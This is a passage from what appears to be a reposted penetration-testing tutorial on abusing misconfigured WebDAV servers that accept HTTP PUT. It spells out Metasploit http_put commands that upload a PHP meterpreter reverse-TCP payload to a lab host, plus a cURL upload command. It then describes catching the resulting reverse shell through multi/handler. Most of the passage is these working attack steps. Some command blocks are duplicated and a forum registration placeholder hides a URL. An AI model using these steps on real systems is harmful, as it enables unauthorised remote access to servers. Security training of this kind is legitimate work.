![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-847UTwuj7Ic/W77rkILqtQI/AAAAAAAAaqo/eGJGmT_PuNoKNwT5JUwRk8k7n20swx4EwCEwYBhgL/s1600/16.png?w=687&ssl=1)
Metasploit
Metasploit Framework is a well-known platform for developing, testing, and executing exploits. It is an open source tool for performing various exploits against the target machines. This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE. PUT is the default.
Metasploit has in-built auxiliary modules dedicated to scanning HTTP methods and gives us the ability to PUT a file with auxiliary/scanner/http/http_put. Below are the commands to accomplish the same
msf> use auxiliary/scanner/http/http_put
msf>auxiliary (http_put) > set rhosts 192.168.1.103
msf>auxiliary (http_put) > set payload php/meterpreter/reverse_tcp
msf>auxiliary (http_put) > set path /dav/
msf>auxiliary (http_put) > set filename meter.php
msf>auxiliary (http_put) > set filedata file://root/Desktop/meter.php
msf>auxiliary (http_put) > exploit
1
2
3
4
5
6
7
msf> use auxiliary/scanner/http/http_put
msf>auxiliary (http_put) > set rhosts 192.168.1.103
msf>auxiliary (http_put) > set payload php/meterpreter/reverse_tcp
msf>auxiliary (http_put) > set path /dav/
msf>auxiliary (http_put) > set filename meter.php
msf>auxiliary (http_put) > set filedata file://root/Desktop/meter.php
msf>auxiliary (http_put) > exploit
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-UgEr2Yr62zc/W77rkVegsHI/AAAAAAAAaqw/_g91tLVqKZYk0Xdok8MV99PNwXs5Wf_lwCEwYBhgL/s1600/17.png?w=687&ssl=1)
Type the same URL in browser 192.168.1.103/dav and execute the same. As evident from the screenshot, the file meter.php has been uploaded on the web server.
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-tOZRLMDQ8y4/W77rkhs-ilI/AAAAAAAAaqw/0spu0p-6fxoFpSortWVf99HYJLKHPMCVACEwYBhgL/s1600/18.png?w=687&ssl=1)
Simultaneously, open Metasploit MSF console and use multi/handler; then go back to previously uploaded meter.php file and run it. This will give us a meterpreter session.
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-Xtw0_4WL1GE/W77rk6gdCyI/AAAAAAAAapw/gipaCNagefk8ru9lpgGvVpT76WErG4p4wCEwYBhgL/s1600/19.png?w=687&ssl=1)
cURL
cURL is a well-known command line tool to send or receive the data using the URL syntax and is compatible with various well-known protocols (HTTPS, FTP, SCP, LDAP, Telnet etc.)
To exploit the PUT method with cURL, the command is:
curl
[To see content please register here]
--upload-file /root/Desktop/curl.php -v1
curl
[To see content please register here]
--upload-file /root/Desktop/curl.php -v![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-FXYI2gJx5aw/W77rlHUWziI/AAAAAAAAaqk/rXCIGrnnUJs8dvw8k2VQ39-m8V7CvmBewCEwYBhgL/s1600/20.png?w=687&ssl=1)
Type the same URL in browser 192.168.1.103/dav and execute the same. As evident from the screenshot, the file curl.php has been uploaded on the web server.
![[Image: 21.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-_KL9pTHjtSA/W77rlh45foI/AAAAAAAAaq0/uh8M3MDSSHEVwtbg8Kh5oPHtvJjphLX8gCEwYBhgL/s1600/21.png?w=687&ssl=1)
Simultaneously, open Metasploit MSF console and use multi/handler; then go back to previously uploaded curl.php file and run it. This will give us a meterpreter session.
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-UXj9gK3LABE/W77rludV3UI/AAAAAAAAaqo/LSN6R3rE2N0fyFqjQtnVFYFoa8y-jHMwgCEwYBhgL/s1600/22.png?w=687&ssl=1)
